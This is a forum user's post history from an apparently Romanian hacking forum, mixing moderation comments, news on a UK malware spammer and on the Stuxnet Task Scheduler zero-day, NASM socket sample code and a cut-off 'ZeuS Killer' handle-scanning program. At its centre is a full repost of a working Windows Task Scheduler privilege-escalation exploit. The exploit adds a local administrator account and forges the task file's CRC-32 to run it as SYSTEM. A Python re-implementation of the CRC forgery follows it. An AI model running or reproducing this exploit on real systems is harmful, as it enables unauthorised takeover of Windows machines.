Nytro - Posts: 18713 - Days Won: 701
Everything posted by Nytro
-
1) How does this help you? 2) There are questions that never get any answer, ever; do you have that much patience? Why shouldn't a question get an answer? 3) What's the point, are we learning to count? Stupid ideas.
-
As you can see, the Offtopic category is very busy, because all sorts of things, more or less useful, get posted there. The problem appears when things that belong elsewhere also get posted there, most often requests for various things and requests for help with various problems. These topics have dedicated categories to be posted in, "Cereri" (Requests) and "Ajutor" (Help). I don't see why everything should be posted in "Offtopic". The section is for posts that don't fit in any other category. Of course, I think the chances of getting an answer are higher in "Offtopic" than in the dedicated place, because it's a more visited category, but this way it will turn into a madhouse. As some of you have noticed, if you post in the wrong category (not only in "Offtopic") you will receive a warning. So, before opening a topic, read the category names, and their descriptions if you haven't understood what gets posted in those categories. Indeed, if you want to post a programming tutorial, I won't sanction you if you choose to post it in "Tutoriale Romana/Engleza" or "Programare", for the simple reason that it fits both categories and, moreover, it's something useful that helps the forum members. But if you post all your nonsense in the wrong place, you will be warned. Once again, a bit of attention before posting.
-
You probably also send 20 emails with istealer to steal some messenger passwords... Don't worry, nobody is going to pay any attention to you. Yes, if someone steals your wallet you want them to go to prison; if someone steals the money from your account, why shouldn't they go to prison? In fact you'd all deserve to fill up the prisons; at least the ones who steal wallets "work" to get them, you take 2 programs you don't even know what they do and that's it, you're hackers with money. Nobody looks at a few hundred euros; if you were a smart guy and made more, I'd be posting a news item about you now, but I'm sure that won't be the case.
-
"Hacker" Gets 18 Months in U.K. Prison

Better said "Loser". Good, we got rid of one more thief. Prison for all those like him; put them to work, not out begging.

A Scottish man was sentenced today to 18 months in prison for spamming out e-mails laced with malware and stealing data.

A 33-year-old Scottish man was sentenced today to 18 months in prison in the U.K. for spamming out malware-infected e-mails and stealing data. The sentencing today of Matthew Anderson of Drummuir, Aberdeenshire, Scotland, brought to an end an investigation first launched four years ago.

According to the Metropolitan Police Service (MPS), Anderson was part of a ring that targeted hundreds of businesses in the U.K. with malware starting in 2005. The conspiracy was operated by members of a cyber-crew called m00p that spammed out millions of e-mails laced with malware, authorities said. It was Anderson's job to manage the operation by composing the e-mails and distributing them with virus attachments, police said. The malware allowed Anderson to access private data stored on computers without the knowledge of the computer's owner, according to police.

"This organized online criminal network infected huge numbers of computers around the world, especially targeting U.K. businesses and individuals," said Detective Constable Bob Burls, from the MPS Central e-Crime Unit, in a statement. "Matthew Anderson methodically exploited computer users not only for his own financial gain but also violating their privacy. They used sophisticated computer code to commit their crimes."

The investigation resulted in the arrests of three men—including Anderson—on June 27, 2006. No charges were filed against one of the men, while the other pleaded guilty in 2008, according to reports. According to police, a number of computers were seized at residential addresses in both countries in addition to the suspects' servers as part of the investigation.

When online, Anderson used the profile names of "aobuluz" and "warpigs," authorities said, and operated his illegal business behind the front of an online company called Optom Security that offered security software. Among the evidence police found were screenshots on Anderson's computers taken from other people's Webcams as well as copies of wills, medical reports, password lists and other content, police said.

"The Internet means criminals have increased opportunities to commit crime internationally; however, I'd like to reassure the public that the international law enforcement and antivirus companies' response is increasingly sophisticated," Burls said. "As this case shows, criminals can't hide online and are being held to account for their actions. A complex investigation like this demonstrates what international cooperation can achieve."

Source: Hacker Gets 18 Months in U.K. Prison - Security - News & Reviews
-
Exploit code for one of the zero-day vulnerabilities exploited by Stuxnet

Exploit code for one of the zero-day vulnerabilities exploited by the Stuxnet worm has made its way online. The code exploits a Windows Task Scheduler vulnerability, and can be used to escalate privileges.

The exploit code was added to the Exploit Database operated by Offensive Security Nov. 20. There is no patch currently available for the flaw, though Microsoft said one is forthcoming.

“Microsoft is aware of the public posting of the details of an Elevation of Privilege vulnerability used by the Stuxnet malware,” Jerry Bryant, group manager of Response Communications at Microsoft, said in a statement. “We first discussed this vulnerability in September 2010. Because this is a local Elevation-of-Privilege issue, it requires attackers to be already able to execute code on a targeted machine. A bulletin addressing this issue will be released as part of our regular monthly bulletin cycle in the near future.”

The vulnerability was one of four zero-days used by the malware in its bid to compromise industrial control systems. The three others have all been patched since the worm was discovered this summer.

Researchers have spent the last several months trying to get to the bottom of the Stuxnet worm. Just recently, Symantec reported evidence that it targets frequency converter drives used to control the speed of motors, and that the actual goal of the worm may be to disrupt nuclear programs. In particular, speculation has focused on Iran as a possible target, as it has been the site of many of Stuxnet's infections.

Among the other zero-days Stuxnet has been observed using are the .LNK shortcut vulnerability, patched in August; a vulnerability in the Windows Print Spooler service (MS10-061), patched in September; and another privilege escalation issue (MS10-073), patched in a massive update in October. Early versions of the worm also spread without a vulnerability at all, instead abusing the Windows AutoRun feature (see "How Stuxnet Malware Used AutoRun Trick to Infect PCs - Security - News & Reviews") to compromise machines through infected USB devices.

Source: Exploit Code for Windows Zero-Day Targeted by Stuxnet Goes Public - Security - News & Reviews
-
Windows Task Scheduler Privilege Escalation 0day

# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64

<job id="tasksch-wD-0day">
<script language="Javascript">
crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
);

var hD='0123456789ABCDEF';

// 32-bit value -> 8 uppercase hex digits
function dec2hex(d) {
    h='';
    for (i=0;i<8;i++) { h = hD.charAt(d&15)+h; d >>>= 4; }
    return h;
}

function encodeToHex(str){
    var r=""; var e=str.length; var c=0; var h;
    while(c<e){
        h=str.charCodeAt(c++).toString(16);
        while(h.length<3) h="0"+h;
        r+=h;
    }
    return r;
}

// hex string -> string of raw bytes (one char per byte)
function decodeFromHex(str){
    var r=""; var e=str.length; var s=0;
    while(e>1){
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
        s=s+2; e=e-2;
    }
    return r;
}

// standard table-driven CRC-32 over a hex-encoded buffer
function calc_crc(anyForm) {
    anyTextString=decodeFromHex(anyForm);
    Crc_value = 0xFFFFFFFF;
    StringLength=anyTextString.length;
    for (i=0; i<StringLength; i++) {
        tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
        Table_value = crc_table[tableIndex];
        Crc_value >>>= 8;
        Crc_value ^= Table_value;
    }
    Crc_value ^= 0xFFFFFFFF;
    return dec2hex(Crc_value);
}

// finds the 4 bytes that, placed between leadString and endString,
// make the whole buffer's CRC-32 equal crc32
function rev_crc(leadString,endString,crc32) {
    //
    // First, we calculate the CRC-32 for the initial string
    //
    anyTextString=decodeFromHex(leadString);
    Crc_value = 0xFFFFFFFF;
    StringLength=anyTextString.length;
    //document.write(alert(StringLength));
    for (var i=0; i<StringLength; i++) {
        tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
        Table_value = crc_table[tableIndex];
        Crc_value >>>= 8;
        Crc_value ^= Table_value;
    }
    //
    // Second, we calculate the CRC-32 without the final string
    //
    crc=parseInt(crc32,16);
    crc ^= 0xFFFFFFFF;
    anyTextString=decodeFromHex(endString);
    StringLength=anyTextString.length;
    for (var i=0; i<StringLength; i++) {
        tableIndex=0;
        Table_value = crc_table[tableIndex];
        while (((Table_value ^ crc) >>> 24) & 0xFF) {
            tableIndex++;
            Table_value = crc_table[tableIndex];
        }
        crc ^= Table_value;
        crc <<= 8;
        crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
    }
    //
    // Now let's find the 4-byte string
    //
    for (var i=0; i<4; i++) {
        tableIndex=0;
        Table_value = crc_table[tableIndex];
        while (((Table_value ^ crc) >>> 24) & 0xFF) {
            tableIndex++;
            Table_value = crc_table[tableIndex];
        }
        crc ^= Table_value;
        crc <<= 8;
        crc |= tableIndex;
    }
    crc ^= Crc_value;
    //
    // Finally, display the results
    //
    var TextString=dec2hex(crc);
    var Teststring='';
    Teststring=TextString.substring(6,8);
    Teststring+=TextString.substring(4,6);
    Teststring+=TextString.substring(2,4);
    Teststring+=TextString.substring(0,2);
    return Teststring
}
</script>

<script language="VBScript">
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf

biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")

Function ReadByteArray(strFileName)
    Const adTypeBinary = 1
    Dim bin
    Set bin = CreateObject("ADODB.Stream")
    bin.Type = adTypeBinary
    bin.Open
    bin.LoadFromFile strFileName
    ReadByteArray = bin.Read
    'output.writeline ReadByteArray
End Function

Function OctetToHexStr (arrbytOctet)
    Dim k
    OctetToHexStr = ""
    For k = 3 To Lenb (arrbytOctet)
        OctetToHexStr = OctetToHexStr _
            & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
    Next
End Function

strFileName="C:\windows\system32\tasks\wDw00t"
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 Original: "+crc32

Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
Do Until objExecObject.StdOut.AtEndOfStream
    strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
    ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close
xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)

hexXML = OctetToHexStr (ReadByteArray(strFileName))
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes
finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge

strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")
Set ts = fso.createtextfile (strFileName)
For n = 1 To (Len (strHexString) - 1) step 2
    ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close

Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True
</script>
</job>

This is the exploit used by the Stuxnet worm. Source: Windows Task Scheduler Privilege Escalation 0day
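Added here as an illustration, not part of the original post or of webDEViL's code: the rev_crc step above succeeds because CRC-32 is a linear checksum, so four bytes can always be chosen that steer it to any wanted value. This Python reimplementation (the sample document and helper names are assumptions) shows why a CRC over a file is no protection against tampering; only a keyed MAC or a signature over the file gives that.

```python
import zlib

# CRC-32 (reflected, polynomial 0xEDB88320): the same table the exploit
# above embeds as crc_table, rebuilt here instead of copied.
CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)

# The 256 entries have 256 distinct top bytes, which is what makes one
# update step invertible: the top byte of the new register identifies
# the table entry that was XORed in.
TOP_BYTE_TO_INDEX = {CRC_TABLE[i] >> 24: i for i in range(256)}
assert len(TOP_BYTE_TO_INDEX) == 256


def crc_state(data: bytes, state: int = 0xFFFFFFFF) -> int:
    """Run the CRC-32 register over data, without the final XOR."""
    for b in data:
        state = CRC_TABLE[(state ^ b) & 0xFF] ^ (state >> 8)
    return state


def crc32_of(data: bytes) -> int:
    """Reference value from zlib, used only to verify the forgery."""
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_crc32(prefix: bytes, suffix: bytes, target: int) -> bytes:
    """Return prefix + 4 patch bytes + suffix whose CRC-32 equals target.

    Same idea as rev_crc() in the exploit: walk the register backwards
    from the wanted value through the known suffix, then four more steps
    with the low byte left as the table index; XORing with the register
    after the prefix yields the patch bytes (little-endian).
    """
    after_prefix = crc_state(prefix)
    r = (target & 0xFFFFFFFF) ^ 0xFFFFFFFF   # register value wanted at the end
    for b in reversed(suffix):               # suffix bytes are known: exact inverse
        idx = TOP_BYTE_TO_INDEX[r >> 24]
        r = (((r ^ CRC_TABLE[idx]) << 8) & 0xFFFFFFFF) | (idx ^ b)
    for _ in range(4):                       # unknown bytes: keep the index instead
        idx = TOP_BYTE_TO_INDEX[r >> 24]
        r = (((r ^ CRC_TABLE[idx]) << 8) & 0xFFFFFFFF) | idx
    patch = (r ^ after_prefix).to_bytes(4, "little")
    return prefix + patch + suffix


def demo() -> bool:
    """Constructed sample (assumed, not a real task file): change the
    principal of a task-like document yet keep the CRC a checksum-only
    verifier stored. Returns True when the stored CRC still matches."""
    original = b"<Task><Principal><UserId>S-1-5-21-1000</UserId></Principal></Task>"
    stored = crc32_of(original)
    tampered = b"<Task><Principal><UserId>S-1-5-18</UserId></Principal></Task>"
    # Park the 4 patch bytes inside an XML comment, as the exploit does,
    # so an XML parser will normally skip over them.
    forged = forge_crc32(tampered + b"<!--", b"-->", stored)
    return crc32_of(forged) == stored


if __name__ == "__main__":
    print("CRC-only integrity check defeated:", demo())
```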
-
MinGW is the port (not a complete one, I think) of the GNU compiler for Linux to Windows systems. And the GNU compilers follow the international standards best, unlike the Microsoft-branded products, which come with their own ideas.
-
Yet another topic fit for the trash. He'd have done better making a browser; at least it would have been made by him...
-
It's very good for a start; keep going, I want to see the player.
-
I had made something for Linux, with iptables. The idea is simple. From what I could tell, I think a bot (there are many of them, I don't think you can put them all on ignore; well, maybe you don't want to put on ignore everyone who isn't in your list, and I don't know if that would even help) sends a message like "hey, I changed my avatar", and the messenger client sends a reply, something like that, but I'm not sure. And I blocked access (DROP the packets) from or to (I don't remember which) certain IPs, which I later discovered were Yahoo! servers. And indeed, they no longer detected whether I was invisible or not, but I also no longer received messages, or couldn't send them, or who knows what other problems there were. Anyway, I think something can be done. PS: I'm not very good at this; can iptables restrict traffic based on the contents of a packet, i.e. based on the data? Something simple would be preferable, like "if the packet contains the string/bytes xyz"... Or anything else.
-
Yeah, what a joy, you find uncle Vasile's website and "hack it"... If you really want to test your skills, test them on a site you have a reason to test them on; don't go looking for some two-bit sites just so you have something to post in Show Off...
-
Judging by the title, the description and the recommended sites, it looks like a big, damn big, two-bit piece of nonsense.
-
Yes, it's well thought out.
-
I like how it looks. Yes, useful.
-
I didn't ban him for that; I banned him for the post about Madalina Manole and another 3-4 stupid posts. Look at all his posts.
-
No, little by little we're getting rid of the rejects.
-
Pff, what tutorials...
-
So much intelligence in the opposing camps. What made you make that exclamation? I'm a Dinamo fan; should I feel insulted by the insults of what is probably a Steaua kid who doesn't even go to the matches of the team he claims to support? Speaking of which, who's coming to the match against Poli, in the stands, at PCH?
-
I'm fat, full of pimples and I wear glasses. You've offended me. Ban? You haven't started off on the right foot; a good step would be to apologize for the insults and write a short self-description to replace the one we've already formed of you.
-
[NASM] Linux Sockets
Author: DemonEmporer

Right so, it's been a while since I actually contributed anything. Declan's Wind0ze hatin' (j/k j/k lol) got me thinkin' about somethin' I could do in Linux. And reading through a few pages I noticed a lack of Linux based ASM, or NASM for that matter. You may find this educational, silly or totally random, or all 3. Either way. So I thought in my spare time I'd start doing some NASM Linux examples (they are Linux specific, not *nix; BSD has a different interpret style). Hello worlds aside, I thought I'd do something slightly more interesting and throw in a socket connection.

%assign SOCK_STREAM 1
%assign AF_INET 2
%assign SYS_socketcall 102
%assign SYS_SOCKET 1
%assign SYS_CONNECT 3
%assign SYS_SEND 9
%assign SYS_RECV 10

section .text
global _start

;--------------------------------------------------
;Functions to make things easier. :]
;--------------------------------------------------
; socket(AF_INET, SOCK_STREAM, 0) via the socketcall multiplexer:
; ebx selects the call, ecx points at the argument array
_socket:
    mov [cArray+0], dword AF_INET
    mov [cArray+4], dword SOCK_STREAM
    mov [cArray+8], dword 0
    mov eax, SYS_socketcall
    mov ebx, SYS_SOCKET
    mov ecx, cArray
    int 0x80
    ret

; connect(sock, edi = &sockaddr_in, 16); si holds the port in host order,
; stored big-endian at offset 2 of sockaddr_in
_connect:
    call _socket
    mov dword [sock], eax
    mov dx, si
    mov byte [edi+3], dl
    mov byte [edi+2], dh
    mov [cArray+0], eax ;sock;
    mov [cArray+4], edi ;&sockaddr_in;
    mov edx, 16
    mov [cArray+8], edx ;sizeof(sockaddr_in);
    mov eax, SYS_socketcall
    mov ebx, SYS_CONNECT
    mov ecx, cArray
    int 0x80
    ret

; send(sock, eax = buffer, ecx = length, 0)
_send:
    mov edx, [sock]
    mov [sArray+0],edx
    mov [sArray+4],eax
    mov [sArray+8],ecx
    mov [sArray+12], dword 0
    mov eax, SYS_socketcall
    mov ebx, SYS_SEND
    mov ecx, sArray
    int 0x80
    ret

_exit:
    mov eax, 1
    int 0x80

; write(1, ecx = buffer, edx = length)
_print:
    mov ebx, 1
    mov eax, 4
    int 0x80
    ret

;--------------------------------------------------
;Main code body
;--------------------------------------------------
_start:
    ; parse the dotted-quad szIp into the 4 address bytes at sockaddr_in+4
    mov esi, szIp
    mov edi, sockaddr_in
    xor eax,eax
    xor ecx,ecx
    xor edx,edx
.cc:
    xor ebx,ebx
.c:
    lodsb
    inc edx
    sub al,'0'
    jb .next            ; '.' or NUL ends the current octet
    imul ebx,byte 10
    add ebx,eax
    jmp short .c
.next:
    mov [edi+ecx+4],bl
    inc ecx
    cmp ecx,byte 4
    jne .cc
    mov word [edi], AF_INET
    ; parse the decimal szPort
    mov esi, szPort
    xor eax,eax
    xor ebx,ebx
.nextstr1:
    lodsb
    test al,al
    jz .ret1
    sub al,'0'
    imul ebx,10
    add ebx,eax
    jmp .nextstr1
.ret1:
    xchg ebx,eax
    mov word [sport], ax  ; sport is 2 bytes; store only ax so buff is not overwritten
    mov si, [sport]
    call _connect
    cmp eax, 0
    jnz short _fail
    mov eax, msg
    mov ecx, msglen
    call _send
    call _exit
_fail:
    mov edx, cerrlen
    mov ecx, cerrmsg
    call _print
    call _exit
_recverr:
    call _exit
_dced:
    call _exit

section .data
cerrmsg db 'failed to connect ',0xa
cerrlen equ $-cerrmsg
msg db 'DIE DIE DIE!',0xa
msglen equ $-msg
szIp db '127.0.0.1',0
szPort db '256',0

section .bss
sock resd 1
;general 'array' for syscall_socketcall argument arg.
cArray resd 1
       resd 1
       resd 1
       resd 1
;send 'array'.
sArray resd 1
       resd 1
       resd 1
       resd 1
;duh?
sockaddr_in resb 16
;..
sport resb 2
buff resb 1024

Assemble: nasm -o socket.o -f elf32 -g socket.asm
Link: ld -o socket socket.o

It uses 0 external libraries, hence the ld link line. Next time, we might do something with GTK (QT has a CPP interface and is more annoying to call from ASM XD). If you have any questions, feel free to ask and I'll answer as best I can.
-
[C] ZeuS Killer
Author: I don't know...

// Built as C++ (declarations inside if/for) against an ntdll.h that supplies
// the Nt* prototypes and SYSTEM_HANDLE_INFORMATION.
#include <windows.h>
#pragma warning(disable : 4005) // macro redefinition
#include <ntdll.h>
#pragma warning(default : 4005)
#include <shlwapi.h>
#include <shlobj.h>

// Walks every handle on the system looking for the bot's named pipe
// ("__SYSTEM__" / "_AVIRA_"), talks to it with command dwArg and copies the
// answer into lpOut; the mutex name is derived from the pipe name.
void GetZeusInfo(ULONG dwArg, PCHAR lpOut, DWORD dwOutLn, PCHAR lpMutex, DWORD dwMutexLn)
{
    PSYSTEM_HANDLE_INFORMATION shi = 0;
    NTSTATUS Status = 0;
    ULONG len = 0x2000;
    POBJECT_NAME_INFORMATION obn = 0;
    HANDLE proc = 0, thandle = 0, hFile = 0;
    BOOLEAN enable = FALSE;
    UCHAR name[300] = {0};
    ULONG temp = 0, rw = 0;

    // grow the buffer until the handle table fits
    do
    {
        shi = (PSYSTEM_HANDLE_INFORMATION)malloc(len);
        if (shi == 0)
        {
            return;
        }
        Status = NtQuerySystemInformation(SystemHandleInformation, shi, len, NULL);
        if (Status == STATUS_INFO_LENGTH_MISMATCH)
        {
            free(shi);
            len *= 2;
        }
        else if (NT_ERROR(Status))
        {
            free(shi);
            return;
        }
    } while (Status == STATUS_INFO_LENGTH_MISMATCH);

    RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, 1, 0, &enable);

    for (int i=0; i<(int)shi->uCount; i++)
    {
        proc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, shi->aSH[i].uIdProcess);
        if (proc == 0)
        {
            continue;
        }
        Status = NtDuplicateObject(proc, (HANDLE)shi->aSH[i].Handle, NtCurrentProcess(), &thandle, 0, 0, DUPLICATE_SAME_ACCESS);
        if (NT_ERROR(Status))
        {
            NtClose(proc);
            continue;
        }
        Status = NtQueryObject(thandle, ObjectNameInformation, 0, 0, &len);
        if (Status != STATUS_INFO_LENGTH_MISMATCH || len == 0)
        {
            NtClose(thandle);
            NtClose(proc);
            continue;
        }
        obn = (POBJECT_NAME_INFORMATION)malloc(len);
        if (obn == 0)
        {
            NtClose(thandle);
            NtClose(proc);
            continue;
        }
        Status = NtQueryObject(thandle, ObjectNameInformation, obn, len, &len);
        if (NT_ERROR(Status) || obn->Name.Buffer == 0)
        {
            free(obn);
            NtClose(thandle);
            NtClose(proc);
            continue;
        }
        RtlZeroMemory(name, sizeof(name));
        WideCharToMultiByte(CP_ACP, 0, obn->Name.Buffer, obn->Name.Length >> 1, (LPSTR)name, 300, NULL, NULL);
        if (strstr((LPSTR)name, "__SYSTEM__") || strstr((LPSTR)name, "_AVIRA_"))
        {
            lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\");
            lstrcatW((LPWSTR)name, obn->Name.Buffer);
__retry:
            hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
            if (hFile == INVALID_HANDLE_VALUE)
            {
                WaitNamedPipeW((LPWSTR)name, INFINITE);
                hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
                if (hFile == INVALID_HANDLE_VALUE)
                {
                    // the object name may carry a \BaseNamedObjects\ prefix; strip it and retry
                    WCHAR wszBNO[] = { L"\\BaseNamedObjects\\" };
                    if (LPWSTR wszBNOPos = StrStrW((LPWSTR)name, wszBNO))
                    {
                        lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\");
                        lstrcatW((LPWSTR)name, (LPWSTR)((PBYTE)wszBNOPos + (sizeof(wszBNO) - 1 * sizeof(WCHAR))));
                        goto __retry;
                    }
                    free(obn); NtClose(thandle); NtClose(proc);
                    continue;
                }
            }
            temp = PIPE_READMODE_MESSAGE;
            if (!SetNamedPipeHandleState(hFile, &temp, 0, 0))
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            // request: command id, then a zero dword, then an empty write
            temp = dwArg;
            if (!WriteFile(hFile, &temp, 4, &rw, 0))
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            temp = 0;
            if (!WriteFile(hFile, &temp, 4, &rw, 0))
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            temp = 0;
            if (!WriteFile(hFile, &temp, 0, &rw, 0))
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            // reply: a dword, then the payload length, then the payload (wide string)
            temp = 0;
            if (!ReadFile(hFile, &temp, 4, &rw, 0))
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            temp = 0;
            if (!ReadFile(hFile, &temp, 4, &rw, 0))
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            if (temp > MAX_PATH)
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            rw = temp;
            temp = (ULONG)malloc(temp);
            if (!temp)
            {
                CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            if (!ReadFile(hFile, (PVOID)temp, rw, &rw, 0))
            {
